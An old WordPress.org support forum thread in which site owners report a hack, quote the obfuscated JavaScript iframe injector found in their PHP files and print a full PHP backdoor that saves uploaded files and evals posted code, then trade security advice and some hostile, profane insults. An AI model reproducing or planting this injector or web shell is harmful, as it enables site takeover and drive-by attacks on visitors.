WordPress.org

Ready to get started?Download WordPress

Forums

got hacked (58 posts)

  1. zikzak
    Member
    Posted 6 years ago #

    hi,
    the following script had been inserted to my blog:

    <?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?><?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

    after the insertion my website only displayed a white screen and a popup to run activex was appearing.In the left bottom of the browser i was seeing a weird link saying: http://www.wp-stats-php.info/iframe/wp-stats.php
    i opend the source file and i saw that the script is found on the top and the bottom.
    i checked all my theme php files and the script was also there and on my config.php, index.php too so i delete the script from every file where it was inserted. The problem was solved

    NOW THE QUESTION IS HOW WAS THIS SCRIPT INSERTED AND HOW CAN IT BE AVOIDED?

    I am using using wordpress 2.5 with the following plugins:
    -scf2-contact-form
    -simplemodal-contact-form-smcf
    -ibox
    -dailytop10

    thanks in advance for any clarification

  2. clarkeian
    Member
    Posted 6 years ago #

    I also just got hacked like this. We don't seem to have any plugins in-common, but I found that a lot of PHP files contained the following:

    <?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

    Very scary...

  3. elorgwhee
    Member
    Posted 6 years ago #

    I was hacked just today as well with the same symptoms mentioned above (the ActiveX and the wp-stats, etc). This appears to be almost a bi-monthly thing and my friends and I started to suspect some sort of vulnerability in the theme I'm using (Hemmingway) - though this particular problem is new. Normally the posts are hacked with some sort of sql injection that causes the rest of the site to not load. It's not normally this bad.

    This was inserted into the bottom of ALL of my pages - they even got the 404.php! I'm going through and removing all the code now. It looks like I can't even load /wp-admin/ either??

    <?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

    I have the following plugins:
    Akismet
    Awesomnews (not used or active though)
    maintenance mode
    pownce-for-wordpress (not yet used or active I don't think - can't confirm cuz I'm still cleaning up the code so I can login)
    wordpress-automatic-upgrade
    hello dolly
    stats

    They even got my plugins php files?!?
    I also found some "pre_hello.php" file in my plugins directory. It looks like 3 pages of stuff - the first and last are all just carriage returns while the middle is code with lots of "testdata" bits.

  4. clarkeian
    Member
    Posted 6 years ago #

    The only plugin we have in common is Akismet.

    I've done a fresh install and deactivated all plugins except Akismet. Could this be a hole in WordPress itself?

  5. BouncinDave
    Member
    Posted 6 years ago #

    It's not just wordpress

    2 of my Joomla! installs have had the same problem, and one of my wordpress installs...

    Any solution other than wiping and reinstalling?

  6. elorgwhee
    Member
    Posted 6 years ago #

    Looks like they tagged all the php files - and even the files like the readme.html - though that file obviously doesn't have the <?php tags in it.

    There are these seemingly random files that start with pre_ that don't appear to have any normal wordpress code in it. They have the page of blank space at the top and bottom. Looks like they found another php file and created a new file with that name but added "pre_" to the beginning?? "pre_hello.php" in the plugins directory, "pre_wp-cron.php" in the root directory...

    Here's the code:

    <?php
    @error_reporting(E_ALL);
    @set_time_limit(0);
    global $HTTP_SERVER_VARS;
    
    define('PASSWD','b40395b7ce76774c614419fbeb3dd9a9');
    
    function say($t) {
      echo "$t\n";
    };
    
    function testdata($t) {
      say(md5("mark_$t"));
    };
    
    echo "<pre>";
    testdata('start');
    if (md5($_POST["p"]) == PASSWD) {
      if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
        $HTTP_POST_FILES["s"]["size"])) {
          if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
          {
          testdata('save_ok');
          };
          //eval($code);
      } else {
        testdata('save_fail');
      };
    
      if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
        $HTTP_POST_FILES["f"]["size"]))
      {
          eval($code);
          testdata('ok');
      } else {
        testdata('fail');
      };
    
    } else {
      testdata('pass');
    };
    
    testdata('end');
    echo "</pre>";
    ?>
  7. Ivovic
    Member
    Posted 6 years ago #

    if you've been hacked on a previous version, and then upgraded to wp2.5.1, chances are you didn't clear out all your files from your hosting space, and whatever was planted there by your hackers is still there.

    a fresh install doesn't mean anything if have not changed your passwords to *everything* including the DB and all privileged user accounts on your blog, or if you allowed any files to remain on your hosting space when you uploaded this fresh copy of wordpress.

    the other possibility of course, is that your shared hosting environment is poorly configured to allow your neighbours to write into your space. In that case, no matter what you do, if Joe next door is hacked, so are you.

  8. elorgwhee
    Member
    Posted 6 years ago #

    Another update -
    Is anyone running Vanilla forum? If it started in wordpress, then it "leaked" into my forum as well. This is going to take forever to clean up.

  9. elorgwhee
    Member
    Posted 6 years ago #

    @Ivovic -
    Yeah, I'm currently working on fresh installs with all new passwords, etc., on a new server. Hopefully this will help. (So far?) it's only my old install on my old server.

  10. zikzak
    Member
    Posted 6 years ago #

    so where are the wordpress people??

    do we have to stay afraid of hackers every time a new version comes up??

    And any solution to this problrn now?

    **All my 4 domians hosted under the same account( not all using wordpress) are now down becuse some guys working on wordpress didn't have time to check their code for bugs!

  11. clarkeian
    Member
    Posted 6 years ago #

    What I'm more interested in is how they got in in the first place. I've asked our sysadmin, who is pretty good at hunting down this sort of thing, to investigate our logs.

    The real problem here is PHP itself, it makes it way too easy to build websites with hard-to-find vulnerabilities, so much so that even experienced PHP coders like those at WordPress screw up periodically.

  12. whooami
    Member
    Posted 6 years ago #

    just to inject something, pardon the pun, a plugin not being active as no bearing on whether or not its exploitable. An exploitable plugin isnt any less exploitable because its not active.

  13. whooami
    Member
    Posted 6 years ago #

    So where are the wordpress people??

    do we have to stay afraid of hackers every time a new version comes up??

    And any solution to this problrn now?

    **All my 4 domians hosted under the same account( not all using wordpress) are now down becuse some guys working on wordpress didn't have time to check their code for bugs!

    Thats such crap.

    I am using using wordpress 2.5 with the following plugins:

    Maybe instead JUST joining this forum after you have been hacked, you should have been paying more attention.

    http://wordpress.org/development/2008/04/wordpress-251/

    Your complaint is moot dude, you arent even running a current version.

  14. BouncinDave
    Member
    Posted 6 years ago #

    I'm talking to my server admin, and it's apparently being caused by something from http://www.wp-stats-php.info/

    Since I cant get to my admin panel I cannot tell you what file it is that does this.

  15. zikzak
    Member
    Posted 6 years ago #

    @whooami, instead of wasting ur time evaluating how bad my comment is why don't you go spent ur time finding a solution to the problem, i think it's more useful for u.. who knows u may become a wordpress hero babe!

  16. whooami
    Member
    Posted 6 years ago #

    how about you drop dead, babe. Sounds like youre the one that needs to find the solution.

    I never thought that I would think this, much less say it, but some people get what they deserve I guess. If you cannot be bothered to spend the little fucking time it takes to read the crap on your dashboard, and actually click a cpl links, then you have little right to come here and bash the people that work on this software. You're a non-factor.

  17. Ivovic
    Member
    Posted 6 years ago #

    lemme jump in on the dogpile too...

    The real problem here is PHP itself, it makes it way too easy to build websites with hard-to-find vulnerabilities, so much so that even experienced PHP coders like those at WordPress screw up periodically.

    "easy to build websites with hard to find vulnerabilities"

    I'm surprised the universe didn't implode when you said that. If it's easy to build... then surely it's easier to find the vulnerabilities than if it were HARD to build with it, right?

    What's your point anyway? You want something absolutely bug-free? Sorry it doesn't exist.

    The more popular something becomes, the bigger a target it is. You chose wordpress because everyone thinks it's great. That's the same reason the hackers are after it.

    Deal, or switch to a publishing platform nobody's ever heard of. It won't be any more secure, but you'll feel safer because you don't have a big red target painted on your ass.

    Trade ease of use, compatibility and extensibility for obscurity, then we'll see you on their forum complaining that they don't have as many nice features as wordpress.

  18. Joni
    Member
    Posted 6 years ago #

    **All my 4 domians hosted under the same account( not all using wordpress) are now down because some guys working on wordpress didn't have time to check their code for bugs!

    Nope. That dog won't hunt. Your sites are down because you are probably on a shared server. It's only as safe as the least secure user on it. That very well might be you, given your stunning ignorance of your situation, but it might be someone else on that shared server.

    Blaming WordPress for every problem you are experiencing with your WordPress and non-WordPress sites ... well it just leaves me speechless. People are hacked not because they are running WordPress, but because of PHP vulnerabilities. So it's not just a WordPress issue.

    And yeah, upgrade your damn installs when you are supposed to and spare yourself (and the rest of us) some grief.

  19. Ivovic
    Member
    Posted 6 years ago #

    general unsolicited advice:

    1) pay $5 more per month and use a VPS. Having your own apartment is nicer, plus you discover wonderous new possibilities.

    2) keep your wordpress up-to-date. It's not easy if you like to tinker, but do it anyway.

    3) research your plugins before you upload them, see if people have had any security issues with them.

    4) keep your plugins updated, and actually remove any plugins you don't intend to use, don't just deactivate them.

    5) read this, then read it again.

    6) actually DO what it says once you've read it.

  20. Ivovic
    Member
    Posted 6 years ago #

    That dog won't hunt

    wow, that's a real saying? I thought Dr Phil was just talking out of his arse, I didn't realise all texans did it :P~~

  21. zikzak
    Member
    Posted 6 years ago #

    Blaming WordPress for every problem you are experience with your WordPress and non-WordPress sites

    the hack was made just after some days of the launch of a new wordpress powered website

  22. Joni
    Member
    Posted 6 years ago #

    Yep. And while we're at it:
    Y'all .. singular
    All y'all .. plural :-P

  23. Joni
    Member
    Posted 6 years ago #

    Zizak, that could well just be a coincidence. The problem is, as I said, that in a shared hosting environment, you just can't ever be certain HOW a hacker gained access to your site and its files. Even if he used WP to hack your site, that doesn't necessarily mean he gained access to the server through YOU.

    Please do read the link that Ivovic posted above.

    The biggest problem I see with WP hackery and why it's so attractive is that there are just scads of folks out there new to the web, new to having their own server space, new to WordPress, who just slap WordPress up (often via Fantastico), and then don't think another thing about it. They don't familiarize themselves with even the most BASIC concepts of site security. This is a hacker's dream come true. So unless the unwashed WP masses out there EDUCATE THEMSELVES (knowledge has been and always will be power, people!), this won't abate.

  24. Ivovic
    Member
    Posted 6 years ago #

    my all-time favourite southernism is "all y'all" ;)

    as in "all y'all should get to readin' about wordpress security"

  25. whooami
    Member
    Posted 6 years ago #

    1) pay $5 more per month and use a VPS. Having your own apartment is nicer, plus you discover wonderous new possibilities.

    hahah, yeah, right -- that's advice thats going to nowhere. We are largely, as Joni says, dealing with squabs. Cheap squabs, too. ( and no you cant have that word as it relates to WP, I plan on using it :P ).

    besides, being on shared hosting isnt a problem, prima facie. LOTS and LOTS of people do just fine on shared hosting, and NEVER have these sorts of problems.

  26. Ivovic
    Member
    Posted 6 years ago #

    that *is* true, but with people running around chmodding everything to 777... that's gotta be reaching critical mass at some point.

    Anyway, that point wasn't *just* about security, it is much nicer having a certain amount of allocated cpu and ram, especially now that wordpress is getting a little hungrier.

    I agree with you though... a) it's not the most important point I've ever made, and b) none of these guys want to pay that much per year, let alone per month.

  27. whooami
    Member
    Posted 6 years ago #

    that *is* true, but with people running around chmodding everything to 777... that's gotta be reaching critical mass at some point.

    thats why those of us that are not squabs get off those shared hosts. I am all for squab-webhosting.com setting up shop.

    Let them chmod 777 all they want. :)

    Eventually, those people will all end up back here.

  28. Ivovic
    Member
    Posted 6 years ago #

    squabsr.us is available ;)

  29. deuced
    Member
    Posted 6 years ago #

    [offtopic]Sorry to interfere but a VPS isnt a solution. A good shared hosting in a good hosting company is IMHO a lot safer than a cheap VPS in a bad hosting company. Especially when most of ppl CANNOT administrate a server! That's a hacker's dream![/offtopic]

  30. whooami
    Member
    Posted 6 years ago #

    dueced, that is so true.

    ivovic, dude! I just found a better one thats available, wanna go into bidness?

Topic Closed

This topic has been closed to new replies.

About this Topic